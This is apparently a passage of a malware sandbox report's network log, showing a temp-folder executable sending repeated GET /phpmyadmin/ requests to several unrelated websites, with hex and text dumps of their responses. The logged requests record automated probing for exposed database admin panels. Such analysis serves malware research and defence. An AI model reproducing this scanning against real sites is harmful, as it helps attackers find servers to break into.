                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:33 UTC4096INData Raw: 35 34 46 2d 32 35 46 31 31 33 43 42 43 31 30 32 2e 6a 70 65 67 22 2c 22 63 6f 6e 74 65 6e 74 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6b 61 6e 61 70 79 2e 73 6b 2f 65 73 68 6f 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 32 2f 30 35 2f 39 39 46 36 34 45 43 37 2d 31 43 37 41 2d 34 30 38 35 2d 41 35 34 46 2d 32 35 46 31 31 33 43 42 43 31 30 32 2e 6a 70 65 67 22 2c 22 77 69 64 74 68 22 3a 31 35 30 30 2c 22 68 65 69 67 68 74 22 3a 31 30 30 30 2c 22 63 61 70 74 69 6f 6e 22 3a 22 53 68 6f 77 72 6f 6f 6d 20 4b 61 6e 61 70 79 20 69 6e 74 65 72 69 c3 a9 72 20 76 20 54 72 6e 61 76 65 22 7d 2c 7b 22 40 74 79 70 65 22 3a 22 42 72 65 61 64 63 72 75 6d 62 4c 69 73 74 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6b 61 6e 61 70 79 2e 73
                                                                                                                                                                                                                                                                                                                                Data Ascii: 54F-25F113CBC102.jpeg","contentUrl":"https://kanapy.sk/eshop/wp-content/uploads/2022/05/99F64EC7-1C7A-4085-A54F-25F113CBC102.jpeg","width":1500,"height":1000,"caption":"Showroom Kanapy interir v Trnave"},{"@type":"BreadcrumbList","@id":"https://kanapy.s
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:33 UTC4096INData Raw: 6e 61 70 79 2e 73 6b 2f 65 73 68 6f 70 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73 2f 63 6c 61 73 73 69 63 2d 74 68 65 6d 65 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 31 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30 30 30 30 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77
                                                                                                                                                                                                                                                                                                                                Data Ascii: napy.sk/eshop/wp-includes/css/classic-themes.min.css?ver=1' type='text/css' media='all' /><style id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--w
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:33 UTC4096INData Raw: 72 61 70 3a 20 77 72 61 70 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 20 3e 20 2a 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 2e 68 61 73 2d 62 6c 61 63 6b 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63 79 61 6e 2d 62 6c 75 69
                                                                                                                                                                                                                                                                                                                                Data Ascii: rap: wrap;align-items: center;}body .is-layout-flex > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-blui
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:33 UTC4096INData Raw: 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61
                                                                                                                                                                                                                                                                                                                                Data Ascii: nt-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.ha
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:33 UTC4096INData Raw: 6f 64 75 63 74 2d 6c 69 73 74 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6b 61 6e 61 70 79 2e 73 6b 2f 65 73 68 6f 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73 73 2f 70 61 72 74 73 2f 77 6f 6f 2d 77 69 64 67 65 74 2d 70 72 6f 64 75 63 74 2d 6c 69 73 74 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 37 2e 31 2e 34 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 64 2d 77 69 64 67 65 74 2d 73 6c 69 64 65 72 2d 70 72 69 63 65 2d 66 69 6c 74 65 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6b 61 6e 61 70 79 2e 73 6b 2f 65 73 68 6f 70 2f 77 70 2d 63 6f 6e
                                                                                                                                                                                                                                                                                                                                Data Ascii: oduct-list-css' href='https://kanapy.sk/eshop/wp-content/themes/woodmart/css/parts/woo-widget-product-list.min.css?ver=7.1.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-widget-slider-price-filter-css' href='https://kanapy.sk/eshop/wp-con
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:33 UTC4096INData Raw: 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 64 2d 68 65 61 64 65 72 2d 63 61 72 74 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6b 61 6e 61 70 79 2e 73 6b 2f 65 73 68 6f 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 77 6f 6f 64 6d 61 72 74 2f 63 73 73 2f 70 61 72 74 73 2f 68 65 61 64 65 72 2d 65 6c 2d 63 61 72 74 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 37 2e 31 2e 34 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 64 2d 77 69 64 67 65 74 2d 73 68 6f 70 70 69 6e 67 2d 63 61 72 74 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70
                                                                                                                                                                                                                                                                                                                                Data Ascii: ='all' /><link rel='stylesheet' id='wd-header-cart-css' href='https://kanapy.sk/eshop/wp-content/themes/woodmart/css/parts/header-el-cart.min.css?ver=7.1.4' type='text/css' media='all' /><link rel='stylesheet' id='wd-widget-shopping-cart-css' href='http
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:33 UTC4096INData Raw: 5f 68 69 64 65 22 3a 22 35 30 30 22 2c 22 61 6e 69 6d 61 74 65 5f 73 70 65 65 64 5f 73 68 6f 77 22 3a 22 35 30 30 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 22 3a 22 23 38 31 64 37 34 32 22 2c 22 62 6f 72 64 65 72 22 3a 22 23 62 31 61 36 61 36 63 32 22 2c 22 62 6f 72 64 65 72 5f 6f 6e 22 3a 22 22 2c 22 62 75 74 74 6f 6e 5f 31 5f 62 75 74 74 6f 6e 5f 63 6f 6c 6f 75 72 22 3a 22 23 36 31 61 32 32 39 22 2c 22 62 75 74 74 6f 6e 5f 31 5f 62 75 74 74 6f 6e 5f 68 6f 76 65 72 22 3a 22 23 34 65 38 32 32 31 22 2c 22 62 75 74 74 6f 6e 5f 31 5f 6c 69 6e 6b 5f 63 6f 6c 6f 75 72 22 3a 22 23 66 66 66 22 2c 22 62 75 74 74 6f 6e 5f 31 5f 61 73 5f 62 75 74 74 6f 6e 22 3a 22 31 22 2c 22 62 75 74 74 6f 6e 5f 31 5f 6e 65 77 5f 77 69 6e 22 3a 22 22 2c 22 62 75 74 74 6f 6e 5f 32 5f
                                                                                                                                                                                                                                                                                                                                Data Ascii: _hide":"500","animate_speed_show":"500","background":"#81d742","border":"#b1a6a6c2","border_on":"","button_1_button_colour":"#61a229","button_1_button_hover":"#4e8221","button_1_link_colour":"#fff","button_1_as_button":"1","button_1_new_win":"","button_2_
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:33 UTC4096INData Raw: 63 61 74 69 6f 6e 2f 72 73 64 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 52 53 44 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 61 6e 61 70 79 2e 73 6b 2f 65 73 68 6f 70 2f 78 6d 6c 72 70 63 2e 70 68 70 3f 72 73 64 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 77 6c 77 6d 61 6e 69 66 65 73 74 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 77 6c 77 6d 61 6e 69 66 65 73 74 2b 78 6d 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 61 6e 61 70 79 2e 73 6b 2f 65 73 68 6f 70 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 77 6c 77 6d 61 6e 69 66 65 73 74 2e 78 6d 6c 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 57 6f 72 64 50 72 65 73 73 20 36 2e 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e
                                                                                                                                                                                                                                                                                                                                Data Ascii: cation/rsd+xml" title="RSD" href="https://kanapy.sk/eshop/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://kanapy.sk/eshop/wp-includes/wlwmanifest.xml" /><meta name="generator" content="WordPress 6.1" /><meta n
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:33 UTC4096INData Raw: 6f 77 2e 52 53 49 48 20 3d 20 77 69 6e 64 6f 77 2e 52 53 49 48 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 20 3f 20 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 48 65 69 67 68 74 20 3a 20 77 69 6e 64 6f 77 2e 52 53 49 48 3b 09 0d 0a 09 09 09 09 74 72 79 20 7b 09 09 09 09 09 09 09 09 0d 0a 09 09 09 09 09 76 61 72 20 70 77 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 2e 63 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 6f 66 66 73 65 74 57 69 64 74 68 2c 0d 0a 09 09 09 09 09 09 6e 65 77 68 3b 0d 0a 09 09 09 09 09 70 77 20 3d 20 70 77 3d 3d 3d 30 20 7c 7c 20 69 73 4e 61 4e 28 70 77 29 20 3f 20 77 69 6e 64 6f 77 2e 52 53 49 57 20 3a 20 70 77 3b 0d 0a 09 09 09 09 09 65 2e 74 61 62 77 20 3d 20 65 2e 74 61 62 77 3d 3d 3d 75 6e 64 65 66 69 6e 65 64
                                                                                                                                                                                                                                                                                                                                Data Ascii: ow.RSIH = window.RSIH===undefined ? window.innerHeight : window.RSIH;try {var pw = document.getElementById(e.c).parentNode.offsetWidth,newh;pw = pw===0 || isNaN(pw) ? window.RSIW : pw;e.tabw = e.tabw===undefined


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                77192.168.2.45444646.229.230.814435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC169OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: rotas.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC61INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC110INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 30 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: Vary: Accept-EncodingContent-Length: 209Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC209INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpmyadmin/ was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                78192.168.2.45444846.229.230.814435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC169OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: rotas.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC61INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC110INData Raw: 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 30 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: Vary: Accept-EncodingContent-Length: 209Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC209INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpmyadmin/ was not found on this server.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                79192.168.2.45460735.190.10.694435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC177OUTGET /phpmyadmin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: ericrothphoto.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC564INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Content-Length: 32598
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Set-Cookie: deviceType=desktop; Path=/; Expires=Sat, 21 Dec 2024 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Set-Cookie: devicePixelRatio=1; Path=/; Expires=Sat, 21 Dec 2024 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Set-Cookie: __fp_cjq=; Max-Age=0; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT; HttpOnly; Secure
                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                ETag: HcrOQGpy95KFCSJNzxot200biBM
                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                X-Request-Id: e592bc809fb511ee80766f155f979970
                                                                                                                                                                                                                                                                                                                                Server: None
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC15820INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 70 61 67 65 5f 34 30 34 22 20 64 61 74 61 2d 64 65 76 69 63 65 2d 74 79 70 65 3d 22 64 65 73 6b 74 6f 70 22 20 64 61 74 61 2d 65 6e 76 3d 22 6c 69 76 65 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 50 65 72 73 6f 6e 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 70 61 67 65 5f 34 30 34 20 64 65 73 6b 74 6f 70 20 66 75 6c 6c 42 6c 65 65 64 20 69 65 20 69 65 36 20 69 65 4c 54 45 36 20 69 65 4c 54 45 37 20 69 65 4c 54 45 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 6c
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!doctype html>...[if lt IE 7]><html lang="en" id="page_404" data-device-type="desktop" data-env="live" itemscope itemtype="http://schema.org/Person" class="no-js page_404 desktop fullBleed ie ie6 ieLTE6 ieLTE7 ieLTE8"><![endif]-->...[if IE 7]><html l
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC16384INData Raw: 51 49 62 63 4c 6a 62 55 4c 58 63 5a 66 47 63 42 62 44 31 57 43 6b 62 4c 62 45 41 32 39 37 74 75 4a 73 6c 43 6b 56 4d 32 48 65 4c 46 67 30 6c 44 39 30 46 77 4e 6b 57 6e 65 58 4d 6d 61 37 6d 70 33 4b 68 4e 79 39 35 44 75 56 53 6a 69 37 73 44 43 33 76 45 42 64 54 38 2f 6e 33 55 72 62 4c 75 2b 62 58 30 56 71 4c 6d 71 4e 65 33 62 64 43 62 4e 66 73 6f 4b 4b 47 32 64 7a 73 5a 57 78 4c 50 4f 65 4b 46 76 4c 5a 69 70 5a 6c 48 39 46 6f 54 4e 57 30 63 31 2b 75 52 62 47 43 63 42 47 45 72 6c 5a 66 57 56 75 62 76 74 4f 34 6e 71 71 4c 39 64 4b 4f 39 6f 72 63 57 37 65 74 38 4e 4b 36 48 68 75 49 59 36 4b 59 4d 5a 59 33 4c 63 4f 64 72 50 67 44 51 38 77 75 44 51 4d 69 34 6a 42 61 47 37 42 72 44 57 73 77 62 4d 30 65 4c 51 4b 41 33 39 32 2b 43 4d 74 6f 36 31 6f 59 75 4b 4a 47
                                                                                                                                                                                                                                                                                                                                Data Ascii: QIbcLjbULXcZfGcBbD1WCkbLbEA297tuJslCkVM2HeLFg0lD90FwNkWneXMma7mp3KhNy95DuVSji7sDC3vEBdT8/n3UrbLu+bX0VqLmqNe3bdCbNfsoKKG2dzsZWxLPOeKFvLZipZlH9FoTNW0c1+uRbGCcBGErlZfWVubvtO4nqqL9dKO9orcW7et8NK6HhuIY6KYMZY3LcOdrPgDQ8wuDQMi4jBaG7BrDWswbM0eLQKA392+CMto61oYuKJG
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC394INData Raw: 20 6e 61 76 49 63 6f 6e 2d 73 76 67 2d 2d 77 31 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 39 22 3e 0a 20 20 3c 6c 69 6e 65 20 63 6c 61 73 73 3d 22 6c 69 6e 65 31 22 20 78 31 3d 22 30 22 20 79 31 3d 22 30 22 20 78 32 3d 22 32 30 22 20 79 32 3d 22 30 22 2f 3e 0a 20 20 3c 6c 69 6e 65 20 63 6c 61 73 73 3d 22 6c 69 6e 65 32 22 20 78 31 3d 22 30 22 20 79 31 3d 22 34 2e 35 22 20 78 32 3d 22 32 30 22 20 79 32 3d 22 34 2e 35 22 2f 3e 0a 20 20 3c 6c 69 6e 65 20 63 6c 61 73 73 3d 22 6c 69 6e 65 33 22 20 78 31 3d 22 30 22 20 79 31 3d 22 39 22 20 78 32 3d 22 32 30 22 20 79 32 3d 22 39 22 2f 3e 0a 3c 2f 73 76 67 3e 0a 20 20 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 6f 6c 6c 65 63 74 69 6f 6e 73 2e 6a 73 22 20 64 61
                                                                                                                                                                                                                                                                                                                                Data Ascii: navIcon-svg--w1" viewBox="0 0 20 9"> <line class="line1" x1="0" y1="0" x2="20" y2="0"/> <line class="line2" x1="0" y1="4.5" x2="20" y2="4.5"/> <line class="line3" x1="0" y1="9" x2="20" y2="9"/></svg> </span></a><script src="/collections.js" da


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                80192.168.2.45444283.167.249.74435304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: predajpaliet.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                2023-12-21 04:03:28 UTC266INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Location: https://www.predajpaliet.sk/phpmyadmin/
                                                                                                                                                                                                                                                                                                                                X-SSL: nginx
                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
